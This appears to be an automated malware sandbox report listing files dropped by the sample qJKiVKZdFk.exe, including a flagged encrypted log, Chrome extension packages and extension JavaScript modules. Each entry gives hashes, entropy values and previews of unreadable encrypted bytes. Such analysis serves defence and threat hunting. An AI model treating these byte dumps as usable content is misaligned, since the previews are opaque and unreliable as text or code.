                                                                                                                                      Preview:Microw..1.a....E..35..?.!....y.jM.X~..l.(...9.....N.SR..D..v..=.#nM..B...........H.%p.h.m:..y@.....4|.&..........&C..I..K..A...N..[....#...U.m`..'_.Y<..l.E..........:}....S.+.-|..W8.....p....z.....\Za......9....P%.a...<.f.x.Q.{.&...G..G.(=..*.dpU5.n5FT.`$.H..+..o@....|..a.=.;o.....L._..5.U.Uf.D.'.Z..N.s....ny....]..t#.q.S.;%Y..h%......Z..J+.....h...V....\...b ...:....".6.J.$.........y...+..9..vv-.i.D....6quP.....S.UN..g.O.......XW .T......*...A...YH.B....Y.(.i`+.Mj...H-.A..F.......gC...7b.M~i.hl......Y`......+G.,.:8.v...xtN)..b.:.`.Nh...T.S.Y....$.............z3......X-F.A...M.D~!.."cc..n@...X....B].........mm.^.C^.V.rAGS.=...p...5v.X...OR.".@..9....s..f.M.@[.........6......&|..<.....*]%...nh...$.Fm.....j...;8....y.....v.p..mG.t.[....;..M.<..5..L.l..!.?.t{p...o.N..i.u~.......1.I.....|&..i....$.......m....0.n6u..0.W[=......_.>F.^x..7.a...JF.....+....*.B...H}.'...2..{@.....+o.\..9s.n.v......Y.E..Z9u.....D6...W..T~3..N.....mb......j{.TpfS.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1192270
                                                                                                                                      Entropy (8bit):5.663078740410784
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:VGmasV0SRwJQ4aKVmaS4aMz8Pg3lxJo2cvXtQ:YmasaSRwBaKVzaYcAqtQ
                                                                                                                                      MD5:6478F55719F51EC00E1642785CE74D31
                                                                                                                                      SHA1:BB567518B92BC41B8B80F4A5FA5E36FA3793F734
                                                                                                                                      SHA-256:720C874E9350E841C1800B46377EE0797DB4A3084E6D4600D211D7AA9B8041BE
                                                                                                                                      SHA-512:FFFE9B8AFDC7913D97EF5268E9495778C7FD00B150D3ADC5BC954525CACF08AAB306C9FE28A48FC24741630255DFF21C5D7505A0379F8324E9B702F80A0289D6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Micro.yc_*...#%.1.1.8"....e.D.C..*.....X....z,....*...3j..@&..g>#...s.'O.S.u?..+.........A...s.......4ch...l$....'.Qy=....@.u/......M....<.#.E....._A..|N.SS.`.p:F...dvN.....%.`.w)..Q`e.......|....@..1.`.X).LW..p...?...-.^k.k...mV.O..{...._....;.R.#.8..pEE...d...10.T..d." L|...9M.8....L...T..t......T....x.........{....854y..$.\..".........hw....m....rMm6.w."/.3..B.Tn.B$.../:5./G..1..W..n..E...U....>...w...4.K.....`0p..b.1<y....^.....$...t.if....u......xuB.....,..3.9.z.6]1...'%r.....36........a67...zh...)..d+K4.W0.^^.o..4W'.R....;.....L...........4...@..kW..4.9q>..=E..;o...}.._K........mT3.6.5A.q..[..............4...o\.j......$i.s7.!n7E.r.4..M8 .N.....X..G..!..n^8...z...8.......x...1V.7....A...ha.>7h...;.2A< .x.......5f.I...i....Lv$...A.9.....}.!P.F.....h..|......C.O.F......K...L....8.4...h.^)..Yz..S<..X_(.,...]..[]..-2Q.a\...Sh..7F{.r...RC)+^...7B....e.....g.....P......C+@..538.....v.._..fJ|...k.[C,.........@l.ZG..E...1.Q..K.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):30179
                                                                                                                                      Entropy (8bit):7.99440143287293
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:RxVFm4bIR6aWzMWM3PPaMdsOSg/QFV/klctUwzYxpOc1FHHR:RIVoaWz9M3PSlT11D2wExpOc15HR
                                                                                                                                      MD5:E698625CDE0BD07C83BDD0B9F59FAC5B
                                                                                                                                      SHA1:24F2A912CE258ED7BC5AF17FEE778B84E501D04C
                                                                                                                                      SHA-256:3B3EFCD4AAB4FB05B5ACCE9AEC30AE6B383C510ADD337BDFE4E48422AAEE0144
                                                                                                                                      SHA-512:CFAD21813B5034C4312225EA6E9E3B738C748738B1EA2B3C403C5EB994BB2061B94F57E68CDBC421C2214867458DEE07F4680BA2F3B62DED27A1976C8658B4C6
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:05-10.....!.$N...L...G.......YsPLM.bw..........1r..$.=|ue...Uf...m.QS.=g.&.._..'.X.).6..R`...&,......".Ud..bB~Jgp.F-u6z.'..N.../r..v./.>.K..@d.a.J....c.z......0..7.......v8h.....u'L..*..S~.....:.G..c...S.C.F.f.hZ.B..(.[.....U...U).aQ2B....fI2..`.....IytL.{!..E..i.69A...+....N.b..8.t..#..J.b4t...`....a...m;...D.........B.t}.&RM^..|..[..c..0...bt..%.V...O.tA6aF..fg......EW.31.g.../...Y....&#..p....4<..H....rTr.;M{.32..Tk.$."...6.}.........9..D.tA.C..4.G....L..5Q.....`........^.Yqo..a......... {...}.w...A..a........FH.65..df............6Z.R^Q..N=...=B.Y.S...96..q....E........c.jF.*....i.........\#R......v..0n...._....w..~KT...:K.g.X.S..tR(..._..k..q...=.~....e.L@..j......GG...`U....9>.a.(..c.@...aD..#..i.>T..Gq..0.O.(~.IK..q.-b.E...tS.4.PTlCk..3.a4EP..k..H..h6H.X7.)&....nHO.....bWiMI....2....k2l./ .=.R...8lF..q'%.ctT...n[.....%....Q...=1....d....d..`H..LXH.c......M.*{....N`..C$. .(.[A.g.f.Q.Ut....[T#...=.3....!.<..-...F..8.....P3Z...}...\.Z....

                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir10952_1826612563\f92dd30f-d70e-4c79-98e6-b827a8bb342f.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:Google Chrome extension, version 2111655171
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):248865
                                                                                                                                      Entropy (8bit):7.9858479501352395
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:7h3szKlbIGxXNobLgXh3R07xRQyBVcaxlnfP:7hWKlkwXNxbOVnX
                                                                                                                                      MD5:A00C5395A97839FA9FAA59A624C974A5
                                                                                                                                      SHA1:944D4A32FEAAD10FE8A96CA7E41251D6A5F2952A
                                                                                                                                      SHA-256:C07F89A628FBEA476E3D85CC2C246A1BCD4AEE417093F7FCB7F542EB5871F257
                                                                                                                                      SHA-512:6C962E284F6DACCD09DD0EA4BC440E448F424FE1FFB48929977530DCE3144230032FAD3ED4B06554421530171D3896A294C5EB3D9434157DC2B7EAB65E67B738
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Cr24.M.}]c...Bp.ct..za.jh$S.y.G..F............T....&.o..rD:k."}'.A...b0..\.%...A...T.......-_.h.^.[.D%.'?.......Mj3m.R..Pk86FT.]...3-.7.......<D...:..%...zj.e0*(..o.....kG...p...7.7!j.FXpFc.#.K..o<.&B.G.+r....7.....p..J%....owp....~7q#..q..v...U.....TP(>.R~.;0Oo!...\...#Y..f0..(.5.....A...?F.2....pD..B...R.T....u../pTY...A.......`g...;'....q#.p@.dO..zO....G...H...g2^65...A....B\..)...F....~.].Dk6.........D.."..W6$.p....AZD6.f..R.Gk..~.nG.7.(l..e?...j..d!'+Qe...'..G..mP*.jG<...d....5.K4m...sN..$.U)..'....f..O.._.|..pV.......IB........ .........G...1....qiw.^.....n.y.D....$%s.4..p...q>.E...$...0..N:.p..J...2.....o.4_...)...6!$i..T...X..)....K.Y.S/.......p0..AL..j8.f........p0.,6.t.M.Y.Q...).....Z6....7.@>..%....>...R..hN.n...*.D*.1..,..!w..R{2............P..'..$.E.ui.....L...%....z.......Zl..ns..,?....Z.F.n...^e.....Q4.Ri0..3.._s.E.HYN..n....>..}..?..5..........3.F<..s...ro..t...~...WyPJi ..x9..d.;.3.\Mn...-t5..i..q..Z...~=.s..M>.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\10f5ef49-b826-4bae-a469-4fe1cdaa885f.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:Google Chrome extension, version 2745333763
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1332939
                                                                                                                                      Entropy (8bit):7.991220897690401
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:24576:N6CiboyDhzVJofhWbwK1GbejcrbBdXYQHv6voyQFQRHI0oTFU8zatMxpSA6MLq:yD5L371GFrbBKiyGAo0EzatGaX
                                                                                                                                      MD5:6FCE39F4FFBB985EB4BDA63CBF3507DE
                                                                                                                                      SHA1:CCA23669B7A0AF02AE687A614CF165EC4655D690
                                                                                                                                      SHA-256:124DE31AA1F268B8CE227C019A23C0FE8F6329DB26B6A46C1185B843D00BB5D0
                                                                                                                                      SHA-512:86DE1B3DA9F59BA7CB4B1643F4F1115407F063371B4A291CA34F000D7022F55C058BD8512A3021FCB4BEDBB1D56B68B4791034573D324AAE59767ED73A6C2CD7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Cr24.x...E.g.Q....k.0.[..\C9t.$A......-0|....4H.+...w...'..[.....,..J......H...../...:. "..7.........C[4vN....J...f.....D.{.:.Z...?...0.u>o.c..'.+..._5..h...>..8.....X./.!=?t......K7..0h.ta..Bi..y_.;.wG:5..n....O.nb.l..A.{...%fR..<....Fc.Y.m..3n..J...X4.o....T7&.}.g&.Ff...z.9R~.T.....3...U../f^..~..w).9F..b6...C\zE.Eku.....I-...Wo~...#.Y..`...~.#%....#&c"*...".g.78%.&..x:..xz4..8.&....r..L...%....P..*..m.R.j.e..my...y.(.).;......0.W?..j.O._.......FfX1..zq.u..'.X.MO.A[#..{^+5IZ4.......};.<...z^..<G.96.....e.'....J...S..$...l.$n#.f....:J...j...#..>>z.....w.Z..I....%.e%.rz.S-....P..aT..................(1=.h5.f5. ...D.....?.Q......3$bF.7..G[..r.,......V.v...@..:\).]L..<....W...f.;..WU....F....)/..49w..f...Kf....3U...S.7.l..#;...x..$.......2e.0k2.fo6`M..N/.v.*...{....p...F0..s../...*@..... ....#...<..J...!).].....=..=A.X..O4'.C...3d.F1$...L.....\.s.YK.r8.M>_..PV.5..... ..U....oZ.;7./..:l.E.m2.x..:...]}..VR..g.Pb^o.f..........\p.........5...GfY...P

                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\polyfills.js

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2840
                                                                                                                                      Entropy (8bit):7.926201332531688
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:tquONpn0QuLztsL3s8RDTdRqNuXLKAHJ28OVx7Ow5fV8OhUbvPPuSB+jn9xBRD:t/ObgLiL88RFRqvT8i/UbnPkj9x3
                                                                                                                                      MD5:0CC210C01C4FC7B54BFE91E7079D58EB
                                                                                                                                      SHA1:ED16C647AA40D678F2A75E563FE88661D3B57918
                                                                                                                                      SHA-256:8877BC2FC960A0674437BBDE5DD519900331FB728A6C02C20A4FFE92822890DD
                                                                                                                                      SHA-512:E16552F80F5E6DE26A8B88FB86C88B348A7FB5C2868939DE5980D637CA316C9496BDDC0905D61307DCA10CE412070CCAFCFBB8B765C223999A0D3D58763109E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:/****...Qb...........#.y. ..U4.@....w}.E=.'3n..^....Jv.E.......:..?,K^........l........v..v.S.......H.UvbX.....,.^..,$/...}u....m...hY..U...."Qc...yBD<2.y*...f..*..W...I..(...5........@."?2.....]....T.%(.+C.S.Af+{\.S.].#.b..&.d.".r[.[.~....Q.6EQm.7?...T.a.&.8=[.......Q%..~...)....fX.%.+f...L......"Z..8..`T.Z.1..q..e..EV(fN%....er.fS...N.-.r..cE.3....h....\.A......."J...U..v.p...t...7(. ...+..VM.=.......d....Z...T.mFP..Xp..`.b@...:A....N..?.8(....5M3....I=.d..BD.$4.A..w......g.......m..j5....i.x...U.e...q.)W,.E..Hg&.DP..2...se...(7..2p.:.+.fC.|....d.e.A..)C)..zn.}.e.....K......T...K..=..,...B..e.....X5.(.8.p.....T...nIz...{za..5.p..!....zV.gP..R.D.......5,.."..<.n.'..@.O@..v8.'@...*z...!a.I..v..+V................N..J.bX.L{l1..b....GE...d2LG......%.0Z.fU2...............X.j.S;.....i.+|..m .........-.$'.>.....)P.2.M.-..L.\.r..A....M0..T.....>|.fs..T&....:.....T....+...[...{.....F.$.w._....(Z........[.fg.._.....j.Q._^Q..Cc..c.H.../.g4L...X.??f.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\private-api.js

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1498
                                                                                                                                      Entropy (8bit):7.866854372093179
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:iXuQB1XAMuMh0gx+ygskkKBwQpiPiPS8/81XEV1jGOAhKxzFJoOhfQrXjfbnZvtQ:ieQ3X+2eRMTQAPiPSFHv4xzFui4rDZvW
                                                                                                                                      MD5:F28FCC34C5A027A093E65208DE384930
                                                                                                                                      SHA1:2422E7516DC4A6864A02EADBF5890666741B3276
                                                                                                                                      SHA-256:8E06CC02626AD0CC2D5DE4DE11AF4601B931DE531DE4F11E76819631F0D48058
                                                                                                                                      SHA-512:0EFE35697A2888DFCC121B81E6AA0DE32FF8FAB5FEC3B8DDA08C800F1E6F0B7DD430F6D616AC13730D38EC13B56CA3411CEB31172B1D0C50BF181C7A74128F38
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:/****f..0...>s{{...6......../.5..cV.d..d.d..1}....p.".4'<..zW..eI....=c.$....1*...E..T.t..).N.B..O..W.O.W......k.......n.k....}.....-^Z .&..K...v.vb..r.E....o..n....6:.y./%..)...&..eQh\L.....(E.|......V..r)....{G.......G!d.|..EWr..A.....\.}X...`;.@..^a.0.........HL..5.MO...C..#'........^p... .oB.q2.a...6..LJ.Zd/.................UY.&.&*.\..#...X.y9W.(.P.......Md..#.U....!._|..."..l.$...tGq.WL..)..Fv.....}.`......v.n.........6Ph../].X.*...D.x...M?....;..2?........z.$..YR.|.."o.O...4.r ..RF,...>.nH....B..q......j......o.?.. .P.i'.s..*).7..S=.....+.'.Y......"mG.N.@A..00....H..4....7...;.....y...C._..ZZ.(.}E.ez.....lb.i......u.!.+.!.[..?.B..@..d.;..j}....'U8..\H.x.!..#E.@..Y-f*?5..u...uH.....8......!..d..|t`4._*5.V.,..0.j..V.(.y.:.7..B....#..j^....\..W..x..5N...%H4o.1\>..P<....]A...Tg.@.$...@aiI.-w.8.#...D...A..z.6..`.*.....YK-..:..R...;..+..l.\.~_.?-..Y..D@...no.Lf.J.%...]..@...&..1E.7M.;R....h.aA..|..`.. ..x.[./.....rP?.z5.?.$/.SD...@.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\proxy.js

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2367
                                                                                                                                      Entropy (8bit):7.906158930713428
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Z4uvPGEsJkNQ/fxytCymgJiD38etnltXzqbaqD:DGxJkNUfctCdr5lQbai
                                                                                                                                      MD5:13E12C675052A1AEB741CF3221D34941
                                                                                                                                      SHA1:720F47BE7BF17EE0605CFDFF9018CFBA6DB619D9
                                                                                                                                      SHA-256:79DD7AE14A12FDCF35FCA225B104C9D58CF7C106FFFA5343B065E1C2A5FE4A33
                                                                                                                                      SHA-512:1FA761814CBA3239321F9FAF439787AFEAA0BBD0B4B4492C538133AFAF9A3C00CFB0D3F7F9B5E23CC612B33A2DAD2090AC16CB2E523EF1CE75C4239C00A62C90
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:/****B%.l....}..........i...%e...].R.../...B...g$.(.0..=).e ..=:FO.g..&!.8...o..X.\TE`..e.D.....c..........b.t...9..B.t.j...ES..`E.KK...%...........x........6l.......5...Aa.{[./[.l.>3....-GDvI.).c...-..oo...zek....1.%.b...?.iVU...zi.r'B...._x.*.Cc..mJ...h.N.N.n2.M......0\.\o.o.WBx.....<.2....}..]..7...N[YF.l.N.l...8.$..k.'y<Y....._|...oX..Nf...{....+.F.w..:...i..%.n...@..'..,V...C..0.U]4i.g.UR.....i...9./}.q#.v.#W.P......Y.+}j....p...Wj.6......Lz....0q!.J..._........ttW{.Lcdx.+...pM9G. '...2...&..%a..z.....j.....#'.H...0>....x}K......W.....0.....#.N...Hw'..THSP=.....U..S..3.\.$.2..S......A.eu........../q...U.U.%C*....x.......?of`........!P..a.|.<(`/..@.m.o.Yu..R.O...'..o.+..(...hI.im.<....N.z..dY.'.x..9T.....!.[.J....N... ....d6"....2'../`..t....q........O`.B...0/..Q*....3/..C........h.......B.f}...cT...Y....6.X.!%u4..!.m(..`.|..i.3.@%.i...$J..jI.].n......fx..*..c.8.........|Ke1..^..w...7".o9...C.........z.....l.8.8..........5CT......)\U.@7..

                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\session.js

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9671
                                                                                                                                      Entropy (8bit):7.9791498039178625
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:r7HDiOJRzyygItgIbi49H+tQ/t1f9eTB5aX16M3g8XQp2lDMIW3UbE6brI:rLDiOJNE8NiaH+e/tF9eT7aX16MQGUW4
                                                                                                                                      MD5:6DF66B7A2F1F9CA89579DA46E7B6153D
                                                                                                                                      SHA1:9A4949FF44D469EAA7D3E745F16FD12E0F58074C
                                                                                                                                      SHA-256:CA5A648542C1DBF6A9EADD8624FB1C7CA60FC07D56753C6D4ED969C2D9484D62
                                                                                                                                      SHA-512:D0AA5CAFEDE34D7EB398384AF0E3A05603D33DF07EE96E6D35AF8D2E02C60C1724A7C32E673BDA14E611CA73D35F3F42D2F2A6B076C381598FC87D79590A1E87
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:/****.oJ.J%.l..l./[.@....,.....#...F8..sY<v.T!'.>.CV..)..M....N"O.Yk..._a.....|1........0..y.1...._...g..VN..U..b'.n.{....{.f.L.ax...a.F./#Ss....o..A..E.5..........$...$L.wd.v..v...t...A;..'C.'.-;l....fi.=..`.6...R..X..O[m.q...=,.[.IGNQ.U.yQ.....p(...N..(bD.....|X..P.XJ..K..l..jO;.J....`-.....4<.xO...iH2..CI.......d.e..:.Z`uX..........O..W.U.-...?.....Q:dZ5.)....5.._.....X..;/z.N......K.;~Y.)I.i.Dr..F~-i...W......P...R...;.*,.....G.dAbbAHl.5..`<.+...6fj.Wy......U...R...I.....P..P..jmj|.=d.............B..U.. .Z....\u......"..,..6...1...*S(.....DnF...z:....w.z.^..!t..AYC.....0.H..V$.b.c...%|o.-.......s~{...'.P..<F.).8d7.+.}@@3>..I..Z..B....X-...e......,!.CRG.."(IXC.27.......Z......x...O2J\..4NR.5......h.*..4...5.|..u..+.....<|.5Q..3....+d2@......)...D...AR.V...;.y]S...`Ft.c.4.,.4..G.@....}p...I..}z*....v.U....Kt.w&.......f|.z.......A.x.w.v..L$.......~.a...F5...i...^]8_..... !...>.g...f(...j..k...$...cwV.z.C..w...8"......hs..EIk.,yw#."...V.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\settings.js

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1893
                                                                                                                                      Entropy (8bit):7.895619024390658
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:rIOCMgYpFXow/AoeNrLnBL3G1Lv7QVdt6FD:zCspFXowIo07BzY/IE
                                                                                                                                      MD5:A981464E5BFEBDEBE55BC74E96BC01AB
                                                                                                                                      SHA1:D1C1B8F13E0A448691912CD97E34CA2A6FB12245
                                                                                                                                      SHA-256:71C20D97A92DBC082D1C9483A12BBA0160EA9BE1C36AEE6635FADC45028F390C
                                                                                                                                      SHA-512:3C88F4DE0D70E4750474BBE305518E6C2182F8079AD21491D12C8608C9D4BAD6DA167C6A7FA4C4A10D74D422D65984EF924DD57F8CDE57A8CA7B1BA860890B54
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:/****.I.../3[...Gw...qBd.jN7Y.e.d.zhX.E...........O.,e..O&2...|k.+..~.t,.g..It.eW......4.9...~..`g...>2z..O(....8..%Wh.....^.c.?]c.......XqtN......>Z_%]2.r0.1........I....ui.c...7}....:.8.k-.&.0.s.Zn.9.O...v......B..t`..a. .x.@.l.j."...`....5..h)...I..l...m..i.:..$.Y.38.&.......9].......].n@F.e{..8K.%.p.......|uP...j..#9Oq.....Pn.67......v....n.f..Is@xq.[j..`M%?.|..z.wO.A..tB`.&.......,^.@....($F.....r^....R.o...[.`._...:5.........:.. ,0..w.{din.nCu....b.r8......n~W....,.Dv....q..{a.O.s.]@.......^.....!...w....&.?.tn..w....U..x..../.~.....e.....A<.%..A..s.YF.WA..@.m.............s4..mxggQ.&.n_"..I.M6.~wd.c..rN:.gL<de$.Q.B.;....W..B}..,%.q_..y.s.K.M...X{...]Z?kM..0.....>\o...w..."*..V.b../u....-{(.8&..\..X`q:.Y.k........@`C..^.....E?...Cy9..J!..[...gS&cN....:.C..Ii.{..A..X..O..l.0........G%....:......9]...F0N.T.U......{.b.....G........q.....xv......3cM..Q...*..^.d8.G<J*#.*......@....y.....0.wXN.2.>.z..;.(8...}..A...&@.....(.'BC......b...#....

                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\sharepoint-module.js

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1845
                                                                                                                                      Entropy (8bit):7.897814886083714
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:RTwrzqydjEp8T2cZGmPrORq/IIxcB3nzTqaOD6RD:OrOyTJPSRilcBnqFuZ
                                                                                                                                      MD5:D68DB72CB4E847662078C598937100B9
                                                                                                                                      SHA1:2C8C8710FAFCFC52333978698EAAB0849035768C
                                                                                                                                      SHA-256:65CC88695772CDF3A2CC44D042C4D3B5F6F24197C7482DF64DCE61EA3F549F34
                                                                                                                                      SHA-512:227DB2FF01A4DF1D374E14D7ABEF53CE9A00F4D1C273ED6B700A10D16940D80CD0B68DD6A936480AB7E7F1CBA4A3DDF3DE9B82EC7A40AD3A5FB381C7404E9ABE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:/****.m.......-.r..!..l`G....@n..[r....I..&...ok.........q.......u.%Y!.]..fP..nq.....>.j.'...w%.Et#\~....2PfN...*..vP......].~F.C.iE.(...\D?.n2.Q$..b......:x.e-7.V.t{?{f)T...it.^.. .......R.<AA...".P.........wv...a.......+g...M.F..Ky.8.n...&...R.9.9fx...N...D..^...#6S........../lA%.\6.......N.v.$.......(.x.*m...'.7m......`1..H".r.._C57.f[......q._.....[M.If.!2). .^S7......l..L....r.l.f1f!.f..w....s.?Sh..?.(...........pI+.$6..I.X.M..]P.XL1........gY..v..!.l.-.r...s.._........S.%5...t.b...OM.....&.O..wS.k\;..Dz...6..!-3.+.yS.|bZ"v%...-..la.....r...X....x.p......M "...3.[ ...2.c>..=.R>....71....d.....@...^.oGpY<5....b..q.(...:F..5E..{t..).:lQ'...%j3...(... ..>Ka.h.......|..\.............P.zd...b...?M..../.>....Y>..{.@'..).5..[.m...o..Z.....{...+K$...L.".''8.B..k...l..K..?P..;1.1.<...4....7.1.t......q...^..7W......Pm...1.....?.....5..n.MZQ.2.E.}6F...h].XH.B._....6.l\q...n....`.T(.\.....{..IO..4.Bd.r.......jD..`..b.....t|......x.H.+w.....MV.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\splunkAllowedLogs.js

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2619
                                                                                                                                      Entropy (8bit):7.925756294245535
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:X32RR7HOHzrZQ169ZuJk87fkWaHJWafMF8xP7qlLyyWBM5BbU2sx4bT2+yA1O52X:C5OHBQY9Zu+8VaHJdfMF8c5yxMs6CvAJ
                                                                                                                                      MD5:1DAFCEFB70B45AFD537E5B83E9122A48
                                                                                                                                      SHA1:2103E78CF4050EB8090387474BDDD87F1E84E019
                                                                                                                                      SHA-256:185B66C26F6C3BCAC740A16F30A5150DD963A7E7B8DF83CCE07C455E05FC9DF7
                                                                                                                                      SHA-512:70A731E8D3387BCB4C5876E38B6221A508B745AD4DA9FD9AD6EA0894DB48739DCB3D5B7DF38F2D82EC837FB939A4F047A079370EB17304A244ADC5467303FCAC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:/****..M..JTX..9..T...'C+4.<..,.#.H....w$9.".s3.3.....n.p.U..UZ!..R..,..C{UU.mw...vd.s.*....-.@....cvL...V[oY\,...b..@.../.....O..(.].o.....G.Q.1=.u......"..:....u.z.jt.NV.....m>t].}...=\F>..1....k:...n7..._..3.`q.n....c?....s.x2Z.{.E...q...(...Q..(..!.Erex.{|...a..$..n........2..z83.6.I...A..h..&P....&~k8.".?..D!.....s..|......Zo...U...a..'...V8..{..K....._.N,YX.{..N.38X..........t...2B9.Y..R{.$N..q.W\.....6X@.mS.8..*..f..B...N2..}.1W.n.....+..s..'QT~..{.U"..:...gO'[n..js...\.$...4l...;...DL_.}.`......_5....@...l..&..ap..=.KQOm.E.z.,;.5.[.o.w%.L...u..]..Yl.E..?t1..b?E7W..ni&..q.)....Q...i.h...h..z.C{..Hw.........sh.......I.n./....#.6.oQ.E.P.........t.;.I.m..p1..,.p..G({. .x..\~,.N....6.....Y_....T.!.......Se..ad.Q..]J.J....01...9...$.#..>"T_..[;cR..a`S/..0.DD...{......U.X.s.W....#.R.%,....?..4...Q..5..Br......|OK.J..}.P_....Cmj.$}W.?.:......G.._3...{s...J0.QD.t~.....&.O....v.p:<^.....0...UD7.Jg.......z.f..4H[......M....j_

                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\user-subscription.js

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8521
                                                                                                                                      Entropy (8bit):7.978099382762265
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:UrorHHXqxQce+ip0ymnNG8RB/B3itSSuWcDVyO:UsTH6OK9NGOwS90O
                                                                                                                                      MD5:372A998DA8EB06BC95858AF4E118469B
                                                                                                                                      SHA1:CC47296BFE56FAC2BA7189868B143AB833AC0A89
                                                                                                                                      SHA-256:D085F3373CF617E0979CBB0F2AC0180758CDC4A6C13B7D71428C7686781644E0
                                                                                                                                      SHA-512:90A04ECF265B9281BBBEBE27D5B407F45252B1078E6430D41AC08C6367FC45887290CDF3BA34D57010A2D829EDDD521A061199D8C0AF4EDC09914D0F01161A60
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:/****.g.OA.|.[[->.h.j.646.W|......j...|&z+d.=i......h.ae@..m.Y(#j...V.).FR.........A.,.I.-h+.~Q..t/zR..<w....R.Bq...9......HF]..pcE..J:N9..(?......d...e..!..#@l..V.......y.@...P".......vZ.;v..1.....`..l..b......_...m.....}..1*....`-....@.R.`.TRaOt.~.=........4..$.*..=.B_...p.]....D..o\.A.~1d}..R..8..8O..%..qr..j.L......-S......N...H$.@9O.2../'2..M....J/.Wn...D.f.A.Z.I..'....b.p..S....3,.nq.C.....\.....q..N5*(.U.....(xGz ...........\4\yC(..yxB.K2v......*...Y<.&./..R.(...Q.&..!.0.r}..t....DP.X..._..Ty%..NI.....K.3.8.-.j...S...:...4...8_..........>V*W...}.C._.....+..].....QOt..W.G....tB:..<\3......$.=. ..#U..Lq~.ecE...9~.4..i.n.("..>X.m.Sr.2..!...\Jr...C.b..Ak.....@.d...{..5b.l..a^X..=|T...e...T`.oI..e..7..).~.I.j................Qn...h...XGjg.&.(y../..y.Z...`%../..a...z..g4.........#.G'...%..T...2.....I.....k.JZB.H.W0....h.F........b...b$.....D.t#>.L....<..+.....+...|D.?..1R...).cr.}..F.[C6..>/..rxU.I...?.)l..o.m.X=4.RB$...5...^.?:....rJt..

